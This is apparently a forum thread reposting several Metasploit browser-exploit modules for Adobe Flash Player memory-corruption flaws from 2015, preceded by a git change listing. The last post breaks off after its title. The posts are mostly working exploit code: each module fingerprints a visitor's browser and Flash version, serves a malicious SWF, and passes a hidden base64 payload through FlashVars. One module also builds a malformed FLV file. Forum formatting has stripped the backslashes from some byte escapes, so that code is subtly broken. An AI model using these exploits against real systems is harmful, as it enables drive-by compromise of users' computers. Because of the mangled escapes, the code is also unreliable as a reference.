data/java/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class   | Bin 559 -> 0 bytes
data/java/javapayload/stage/Meterpreter.class    | Bin 2004 -> 0 bytes
data/java/javapayload/stage/Shell.class    | Bin 1235 -> 0 bytes
data/java/javapayload/stage/Stage.class    | Bin 211 -> 0 bytes
data/java/javapayload/stage/StreamForwarder.class    | Bin 1514 -> 0 bytes
data/java/metasploit/AESEncryption.class | Bin 1462 -> 0 bytes
data/java/metasploit/JMXPayload.class    | Bin 345 -> 0 bytes
data/java/metasploit/JMXPayloadMBean.class | Bin 163 -> 0 bytes
data/java/metasploit/Payload.class | Bin 9415 -> 0 bytes
data/java/metasploit/PayloadServlet.class    | Bin 803 -> 0 bytes
data/java/metasploit/PayloadTrustManager.class | Bin 1309 -> 0 bytes
data/java/metasploit/RMILoader.class | Bin 1731 -> 0 bytes
data/java/metasploit/RMIPayload.class    | Bin 498 -> 0 bytes
data/meterpreter/ext_server_android.jar    | Bin 38782 -> 0 bytes
data/meterpreter/ext_server_networkpug.lso | Bin 36132 -> 0 bytes
data/meterpreter/ext_server_sniffer.lso    | Bin 43612 -> 0 bytes
data/meterpreter/ext_server_stdapi.jar | Bin 39662 -> 0 bytes
data/meterpreter/ext_server_stdapi.lso | Bin 208412 -> 0 bytes
data/meterpreter/meterpreter.jar | Bin 24752 -> 0 bytes
data/meterpreter/msflinker_linux_x86.bin | Bin 1490944 -> 0 bytes
external/source/exploits/CVE-2015-0336/Msf.as    | 318 +++++++++++++++++++++++++++++++++++++++++++++++
external/source/exploits/CVE-2015-0336/Trigger/Trigger.as2proj | 60 +++++++++
external/source/exploits/CVE-2015-0336/Trigger/src/Main.as | 18 +++
external/source/exploits/CVE-2015-0359/Msf.as    | 261 ++++++++++++++++++++++++++++++++++++++
lib/metasploit/framework/login_scanner/snmp.rb |   9 +-
lib/metasploit/framework/login_scanner/telnet.rb | 20 ++-
lib/msf/base/serializer/readable_text.rb | 65 ++++++++--
lib/msf/base/sessions/meterpreter.rb | 22 +++-
lib/msf/base/sessions/meterpreter_options.rb | 68 +++++-----
lib/msf/core/auxiliary/login.rb    |   2 +-
lib/msf/core/exploit/smb/server/share.rb | 12 ++
lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb    | 19 ++-
lib/msf/core/exploit/smb/server/share/command/read_andx.rb |   4 +-
lib/msf/core/exploit/smb/server/share/information_level/find.rb    |   8 +-
lib/msf/core/exploit/smb/server/share/information_level/query.rb | 11 +-
lib/msf/core/handler/bind_tcp.rb | 11 +-
lib/msf/core/handler/reverse_hop_http.rb |   4 +-
lib/msf/core/handler/reverse_http.rb | 41 +++---
lib/msf/core/handler/reverse_http/stageless.rb |   2 +
lib/msf/core/handler/reverse_tcp.rb    | 13 +-
lib/msf/core/payload/java.rb | 12 +-
lib/msf/core/payload/linux/bind_tcp.rb | 179 ++++++++++++++++++++++++++
lib/msf/core/payload/windows/bind_tcp.rb | 263 +++++++++++++++++++++++++++++++++++++++
lib/msf/core/payload/windows/exitfunk.rb |   2 +-
lib/msf/core/payload/windows/reflectivedllinject.rb    | 22 ++--
lib/msf/core/payload/windows/reverse_tcp.rb    | 242 ++++++++++++++++++++++++++++++++++++
lib/msf/core/payload/windows/stageless_meterpreter.rb    | 14 ++-
lib/msf/core/payload/windows/x64/bind_tcp.rb | 220 ++++++++++++++++++++++++++++++++
lib/msf/core/payload/windows/x64/block_api.rb    | 117 +++++++++++++++++
lib/msf/core/payload/windows/x64/exitfunk.rb | 84 +++++++++++++
lib/msf/core/payload/windows/x64/reflectivedllinject.rb    | 25 ++--
lib/msf/core/payload/windows/x64/reverse_tcp.rb    | 192 ++++++++++++++++++++++++++++
lib/msf/core/payload/windows/x64/stageless_meterpreter.rb    | 14 ++-
lib/msf/core/rpc/v10/rpc_db.rb | 223 +++++++++++++--------------------
lib/msf/core/session.rb    |   4 +
lib/msf/http/wordpress/version.rb    | 26 +++-
lib/msf/util/exe.rb    |   2 +-
lib/nessus/nessus-xmlrpc.rb    |   7 +-
lib/rex/payloads/meterpreter/patch.rb    | 67 +++++-----
lib/rex/post/meterpreter.rb    |   2 +-
lib/rex/post/meterpreter/client.rb | 27 +++-
lib/rex/post/meterpreter/client_core.rb    | 120 ++++++++++++------
lib/rex/post/meterpreter/extensions/priv/priv.rb |   2 +-
lib/rex/post/meterpreter/extensions/stdapi/ui.rb |   4 +-
lib/rex/post/meterpreter/packet.rb |   9 +-
lib/rex/post/meterpreter/packet_dispatcher.rb    | 11 +-
lib/rex/post/meterpreter/ui/console/command_dispatcher/core.rb | 89 +++++++++++--
lib/sqlmap/sqlmap_manager.rb | 30 +++--
lib/sqlmap/sqlmap_session.rb | 23 ++--
metasploit-framework.gemspec |   2 +-
modules/auxiliary/dos/http/ms15_034_ulonglongadd.rb    | 10 +-
modules/auxiliary/gather/apple_safari_ftp_url_cookie_theft.rb    |   2 +-
modules/auxiliary/gather/java_rmi_registry.rb    |   2 +-
modules/auxiliary/gather/ssllabs_scan.rb |   3 +-
modules/auxiliary/scanner/http/goahead_traversal.rb    |   7 +-
modules/auxiliary/scanner/http/owa_iis_internal_ip.rb    |   3 +-
modules/auxiliary/scanner/http/wp_mobileedition_file_read.rb |   2 +-
modules/auxiliary/scanner/telnet/brocade_enable_login.rb | 154 +++++++++++++++++++++++
modules/exploits/linux/http/multi_ncc_ping_exec.rb |   2 +-
modules/exploits/multi/http/axis2_deployer.rb    |   5 +-
modules/exploits/multi/http/struts_code_exec_exception_delegator.rb    |   3 +-
modules/exploits/multi/misc/java_jmx_server.rb |   2 +-
modules/exploits/multi/misc/java_rmi_server.rb |   2 +-
modules/exploits/unix/webapp/wp_revslider_upload_execute.rb    | 96 ++++++++++++++
modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb |   6 +-
modules/exploits/windows/antivirus/ams_hndlrsvc.rb |   3 +-
modules/exploits/windows/browser/adobe_flash_casi32_int_overflow.rb    |   1 +
modules/exploits/windows/browser/adobe_flash_copy_pixels_to_byte_array.rb |   5 +-
modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb    | 112 +++++++++++++++++
modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb | 118 ++++++++++++++++++
modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb |   3 +-
modules/exploits/windows/http/osb_uname_jlist.rb |   3 +-
modules/exploits/windows/local/run_as.rb |   2 +-
modules/exploits/windows/smb/group_policy_startup.rb | 86 +++++++++++++
modules/payloads/singles/java/shell_reverse_tcp.rb |   4 +-
modules/payloads/stagers/linux/x86/bind_tcp.rb | 78 ++----------
modules/payloads/stagers/windows/bind_tcp.rb | 37 ++----
modules/payloads/stagers/windows/reverse_tcp.rb    | 38 +-----
modules/payloads/stagers/windows/x64/bind_tcp.rb | 48 +------
modules/payloads/stagers/windows/x64/reverse_tcp.rb    | 46 +------
modules/payloads/stages/java/meterpreter.rb    |   3 +-
modules/payloads/stages/linux/x86/meterpreter.rb | 16 ++-
modules/payloads/stages/windows/meterpreter.rb | 10 +-
modules/payloads/stages/windows/patchupmeterpreter.rb    |   2 +-
modules/payloads/stages/windows/x64/meterpreter.rb | 15 +--
msfrpcd    | 10 +-
plugins/msgrpc.rb    |   4 +-
plugins/nessus.rb    | 57 +++------
plugins/sqlmap.rb    | 53 ++++----
scripts/meterpreter/metsvc.rb    |   2 +-
spec/lib/metasploit/framework/login_scanner/snmp_spec.rb |   2 -
spec/lib/msf/http/wordpress/version_spec.rb    | 88 +++++++++++++
spec/lib/rex/post/meterpreter_spec.rb    |   4 +-
spec/modules/payloads_spec.rb    | 30 ++---
20 files changed, 3477 insertions(+), 712 deletions(-)
create mode 100755 data/exploits/CVE-2015-0336/msf.swf
create mode 100755 data/exploits/CVE-2015-0336/trigger.swf
create mode 100755 data/exploits/CVE-2015-0359/msf.swf
delete mode 100755 data/java/com/metasploit/meterpreter/MemoryBufferURLConnection.class
delete mode 100755 data/java/com/metasploit/meterpreter/MemoryBufferURLStreamHandler.class
delete mode 100755 data/java/javapayload/stage/Meterpreter.class
delete mode 100755 data/java/javapayload/stage/Shell.class
delete mode 100755 data/java/javapayload/stage/Stage.class
delete mode 100755 data/java/javapayload/stage/StreamForwarder.class
delete mode 100755 data/java/metasploit/AESEncryption.class
delete mode 100644 data/java/metasploit/JMXPayload.class
delete mode 100644 data/java/metasploit/JMXPayloadMBean.class
delete mode 100755 data/java/metasploit/Payload.class
delete mode 100755 data/java/metasploit/PayloadServlet.class
delete mode 100755 data/java/metasploit/PayloadTrustManager.class
delete mode 100755 data/java/metasploit/RMILoader.class
delete mode 100755 data/java/metasploit/RMIPayload.class
delete mode 100644 data/meterpreter/ext_server_android.jar
delete mode 100755 data/meterpreter/ext_server_networkpug.lso
delete mode 100755 data/meterpreter/ext_server_sniffer.lso
delete mode 100644 data/meterpreter/ext_server_stdapi.jar
delete mode 100755 data/meterpreter/ext_server_stdapi.lso
delete mode 100644 data/meterpreter/meterpreter.jar
delete mode 100644 data/meterpreter/msflinker_linux_x86.bin
create mode 100755 external/source/exploits/CVE-2015-0336/Msf.as
create mode 100755 external/source/exploits/CVE-2015-0336/Trigger/Trigger.as2proj
create mode 100755 external/source/exploits/CVE-2015-0336/Trigger/src/Main.as
create mode 100755 external/source/exploits/CVE-2015-0359/Msf.as
create mode 100644 lib/msf/core/payload/linux/bind_tcp.rb
create mode 100644 lib/msf/core/payload/windows/bind_tcp.rb
create mode 100644 lib/msf/core/payload/windows/reverse_tcp.rb
create mode 100644 lib/msf/core/payload/windows/x64/bind_tcp.rb
create mode 100644 lib/msf/core/payload/windows/x64/block_api.rb
create mode 100644 lib/msf/core/payload/windows/x64/exitfunk.rb
create mode 100644 lib/msf/core/payload/windows/x64/reverse_tcp.rb
create mode 100644 modules/auxiliary/scanner/telnet/brocade_enable_login.rb
create mode 100644 modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
create mode 100644 modules/exploits/windows/browser/adobe_flash_domain_memory_uaf.rb
create mode 100644 modules/exploits/windows/browser/adobe_flash_net_connection_confusion.rb
create mode 100644 modules/exploits/windows/smb/group_policy_startup.rb

DarckSol · 20.06.2015

Adobe Flash Player ShaderJob Buffer Overflow

This Metasploit module exploits a buffer overflow vulnerability related to the ShaderJob workings on Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute of the ShaderJob after starting the job it's possible to create a buffer overflow condition where the size of the destination buffer and the length of the copy are controlled.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player ShaderJob Buffer Overflow',
      'Description'         => %q{
        This module exploits a buffer overflow vulnerability related to the ShaderJob workings on
        Adobe Flash Player. The vulnerability happens when trying to apply a Shader setting up the
        same Bitmap object as src and destination of the ShaderJob. Modifying the "width" attribute
        of the ShaderJob after starting the job it's possible to create a buffer overflow condition
        where the size of the destination buffer and the length of the copy are controlled. This
        module has been tested successfully on:
        * Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.169.
        * Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.169.
        * Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.169.
        * Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.457.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Chris Evans', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-3090'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-09.html'],
          ['URL', 'https://www.fireeye.com/blog/threat-research/2015/05/angler_ek_exploiting.html'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/05/cve-2015-3090-flash-up-to-1700169-and.html'],
          ['URL', 'http://www.brooksandrus.com/blog/2009/03/11/bilinear-resampling-with-flash-player-and-pixel-bender/']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['win', 'linux'],
      'Arch'                => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :arch    => ARCH_X86,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81
          end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          :flash   => lambda do |ver|
            case target.name
            when 'Windows'
              return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.169')
            when 'Linux'
              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.457')
            end

            false
          end
        },
      'Targets'             =>
        [
          [ 'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'May 12 2015',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf

    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    os_name = target_info[:os_name]

    if target.name =~ /Windows/
      platform_id = 'win'
    elsif target.name =~ /Linux/
      platform_id = 'linux'
    end

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3090', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end
end

DarckSol · 27.06.2015

Adobe Flash Player Drawing Fill Shader Memory Corruption

This Metasploit module exploits a memory corruption happening when applying a Shader as a drawing fill as exploited in the wild on June 2015. This Metasploit module has been tested successfully on: Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188, Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188, Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = GreatRanking

  include Msf::Exploit::Remote::BrowserExploitServer

  def initialize(info={})
    super(update_info(info,
      'Name'                => 'Adobe Flash Player Drawing Fill Shader Memory Corruption',
      'Description'         => %q{
        This module exploits a memory corruption happening when applying a Shader as a drawing fill
        as exploited in the wild on June 2015. This module has been tested successfully on:

        Windows 7 SP1 (32-bit), IE11 and Adobe Flash 17.0.0.188,
        Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 17.0.0.188,
        Windows 8.1, Firefox 38.0.5 and Adobe Flash 17.0.0.188, and
        Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.460.
      },
      'License'             => MSF_LICENSE,
      'Author'              =>
        [
          'Chris Evans', # Vulnerability discovery
          'Unknown', # Exploit in the wild
          'juan vazquez' # msf module
        ],
      'References'          =>
        [
          ['CVE', '2015-3105'],
          ['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-11.html'],
          ['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/magnitude-exploit-kit-uses-newly-patched-adobe-vulnerability-us-canada-and-uk-are-most-at-risk/'],
          ['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3105-flash-up-to-1700188-and.html'],
          ['URL', 'http://help.adobe.com/en_US/as3/dev/WSFDA04BAE-F6BC-43d9-BD9C-08D39CA22086.html']
        ],
      'Payload'             =>
        {
          'DisableNops' => true
        },
      'Platform'            => ['win', 'linux'],
      'Arch'                => [ARCH_X86],
      'BrowserRequirements' =>
        {
          :source  => /script|headers/i,
          :arch    => ARCH_X86,
          :os_name => lambda do |os|
            os =~ OperatingSystems::Match::LINUX ||
              os =~ OperatingSystems::Match::WINDOWS_7 ||
              os =~ OperatingSystems::Match::WINDOWS_81
          end,
          :ua_name => lambda do |ua|
            case target.name
            when 'Windows'
              return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
            when 'Linux'
              return true if ua == Msf::HttpClients::FF
            end

            false
          end,
          :flash   => lambda do |ver|
            case target.name
            when 'Windows'
              return true if ver =~ /^17\./ && Gem::Version.new(ver) <= Gem::Version.new('17.0.0.188')
            when 'Linux'
              return true if ver =~ /^11\./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.460')
            end

            false
          end
        },
      'Targets'             =>
        [
          [ 'Windows',
            {
              'Platform' => 'win'
            }
          ],
          [ 'Linux',
            {
              'Platform' => 'linux'
            }
          ]
        ],
      'Privileged'          => false,
      'DisclosureDate'      => 'May 12 2015',
      'DefaultTarget'       => 0))
  end

  def exploit
    @swf = create_swf

    super
  end

  def on_request_exploit(cli, request, target_info)
    print_status("Request: #{request.uri}")

    if request.uri =~ /\.swf$/
      print_status('Sending SWF...')
      send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
      return
    end

    print_status('Sending HTML...')
    send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
  end

  def exploit_template(cli, target_info)
    swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
    target_payload = get_payload(cli, target_info)
    b64_payload = Rex::Text.encode_base64(target_payload)
    os_name = target_info[:os_name]

    if target.name =~ /Windows/
      platform_id = 'win'
    elsif target.name =~ /Linux/
      platform_id = 'linux'
    end

    html_template = %Q|<html>
    <body>
    <object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
    <param name="movie" value="<%=swf_random%>" />
    <param name="allowScriptAccess" value="always" />
    <param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
    <param name="Play" value="true" />
    <embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
    </object>
    </body>
    </html>
    |

    return html_template, binding()
  end

  def create_swf
    path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3105', 'msf.swf')
    swf =  ::File.open(path, 'rb') { |f| swf = f.read }

    swf
  end
end

krest · 06.07.2015

Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow

Код:

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::BrowserExploitServer

def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player Nellymoser Audio Decoding Buffer Overflow',
'Description' => %q{
This module exploits a buffer overflow on Adobe Flash Player when handling nellymoser
encoded audio inside a FLV video, as exploited in the wild on June 2015. This module
has been tested successfully on:

Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.160,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Windows 8.1, Firefox 38.0.5 and Adobe Flash 18.0.0.160,
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.466, and
Ubuntu 14.04.2 LTS, Firefox 35.01, and Adobe Flash 11.2.202.466.

Note that this exploit is effective against both CVE-2015-3113 and the
earlier CVE-2015-3043, since CVE-2015-3113 is effectively a regression
to the same root cause as CVE-2015-3043.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Exploit in the wild
'juan vazquez' # msf module
],
'References' =>
[
['CVE', '2015-3043'],
['CVE', '2015-3113'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-06.html'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsb15-14.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/new-adobe-zero-day-shares-same-root-cause-as-older-flaws/'],
['URL', 'http://malware.dontneedcoffee.com/2015/06/cve-2015-3113-flash-up-to-1800160-and.html'],
['URL', 'http://bobao.360.cn/learning/detail/357.html']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end

false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
return true if ver =~ /^18./ && Gem::Version.new(ver) <= Gem::Version.new('18.0.0.161')
return true if ver =~ /^17./ && Gem::Version.new(ver) != Gem::Version.new('17.0.0.169')
when 'Linux'
return true if ver =~ /^11./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.466') && Gem::Version.new(ver) != Gem::Version.new('11.2.202.457')
end

false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jun 23 2015',
'DefaultTarget' => 0))
end

def exploit
@swf = create_swf
@flv = create_flv

super
end

def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")

if request.uri =~ /.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end

if request.uri =~ /.flv$/
print_status('Sending FLV...')
send_response(cli, @flv, {'Content-Type'=>'video/x-flv', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end

print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end

def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]

if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end

html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|

return html_template, binding()
end

def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-3113', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }

swf
end

def create_flv
header = ''
header << 'FLV' # signature
header << [1].pack('C') # version
header << [4].pack('C') # Flags: TypeFlagsAudio
header << [9].pack('N') # DataOffset

data = ''
data << "x68" # fmt = 6 (Nellymoser), SoundRate: 2, SoundSize: 0, SoundType: 0
data << "xee" * 0x440 # SoundData

tag1 = ''
tag1 << [8].pack('C') # TagType (audio)
tag1 << "x00x04x41" # DataSize
tag1 << "x00x00x1a" # TimeStamp
tag1 << [0].pack('C') # TimeStampExtended
tag1 << "x00x00x00" # StreamID, always 0
tag1 << data

body = ''
body << [0].pack('N') # PreviousTagSize
body << tag1
body << [0xeeeeeeee].pack('N') # PreviousTagSize

flv = ''
flv << header
flv << body

flv
end
end

krest · 08.07.2015

Adobe Flash Player ByteArray Use After Free

Код:

##
# This module requires Metasploit: [url=http://metasploit.com/download]http://metasploit.com/download[/url]
# Current source: [url=https://github.com/rapid7/metasploit-framework]https://github.com/rapid7/metasploit-framework[/url]
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
Rank = GreatRanking

include Msf::Exploit::Remote::BrowserExploitServer

def initialize(info={})
super(update_info(info,
'Name' => 'Adobe Flash Player ByteArray Use After Free',
'Description' => %q{
This module exploits an use after free on Adobe Flash Player. The vulnerability,
discovered by Hacking Team and made public on its July 2015 data leak, was
described as an Use After Free while handling ByteArray objects. This module has
been tested successfully on:

Windows 7 SP1 (32-bit), IE11 and Adobe Flash 18.0.0.194,
Windows 7 SP1 (32-bit), Firefox 38.0.5 and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), Firefox and Adobe Flash 18.0.0.194,
Windows 8.1 (32-bit), IE11 and Flash 17.0.0.169, and
Linux Mint "Rebecca" (32 bits), Firefox 33.0 and Adobe Flash 11.2.202.468.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Unknown', # Someone from HackingTeam
'juan vazquez', # msf module
'sinn3r' # msf module
],
'References' =>
[
['CVE', '2015-5119'],
['URL', 'https://helpx.adobe.com/security/products/flash-player/apsa15-03.html'],
['URL', 'http://blog.trendmicro.com/trendlabs-security-intelligence/unpatched-flash-player-flaws-more-pocs-found-in-hacking-team-leak/'],
['URL', 'https://twitter.com/w3bd3vil/status/618168863708962816']
],
'Payload' =>
{
'DisableNops' => true
},
'Platform' => ['win', 'linux'],
'Arch' => [ARCH_X86],
'BrowserRequirements' =>
{
:source => /script|headers/i,
:arch => ARCH_X86,
:os_name => lambda do |os|
os =~ OperatingSystems::Match::LINUX ||
os =~ OperatingSystems::Match::WINDOWS_7 ||
os =~ OperatingSystems::Match::WINDOWS_81 ||
os =~ OperatingSystems::Match::WINDOWS_VISTA ||
os =~ OperatingSystems::Match::WINDOWS_XP
end,
:ua_name => lambda do |ua|
case target.name
when 'Windows'
return true if ua == Msf::HttpClients::IE || ua == Msf::HttpClients::FF
when 'Linux'
return true if ua == Msf::HttpClients::FF
end

false
end,
:flash => lambda do |ver|
case target.name
when 'Windows'
# Note: Chrome might be vague about the version.
# Instead of 18.0.0.203, it just says 18.0
return true if Gem::Version.new(ver) <= Gem::Version.new('18.0.0.194')
when 'Linux'
return true if ver =~ /^11./ && Gem::Version.new(ver) <= Gem::Version.new('11.2.202.468')
end

false
end
},
'Targets' =>
[
[ 'Windows',
{
'Platform' => 'win'
}
],
[ 'Linux',
{
'Platform' => 'linux'
}
]
],
'Privileged' => false,
'DisclosureDate' => 'Jul 06 2015',
'DefaultTarget' => 0))
end

def exploit
@swf = create_swf

super
end

def on_request_exploit(cli, request, target_info)
print_status("Request: #{request.uri}")

if request.uri =~ /.swf$/
print_status('Sending SWF...')
send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
return
end

print_status('Sending HTML...')
send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
end

def exploit_template(cli, target_info)
swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
target_payload = get_payload(cli, target_info)
b64_payload = Rex::Text.encode_base64(target_payload)
os_name = target_info[:os_name]

if target.name =~ /Windows/
platform_id = 'win'
elsif target.name =~ /Linux/
platform_id = 'linux'
end

html_template = %Q|<html>
<body>
<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab" width="1" height="1" />
<param name="movie" value="<%=swf_random%>" />
<param name="allowScriptAccess" value="always" />
<param name="FlashVars" value="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" />
<param name="Play" value="true" />
<embed type="application/x-shockwave-flash" width="1" height="1" src="<%=swf_random%>" allowScriptAccess="always" FlashVars="sh=<%=b64_payload%>&pl=<%=platform_id%>&os=<%=os_name%>" Play="true"/>
</object>
</body>
</html>
|

return html_template, binding()
end

def create_swf
path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2015-5119', 'msf.swf')
swf = ::File.open(path, 'rb') { |f| swf = f.read }

swf
end
end

krest · 14.07.2015

Adobe Flash opaqueBackground Use After Free (Hacking Team)

Код:

##
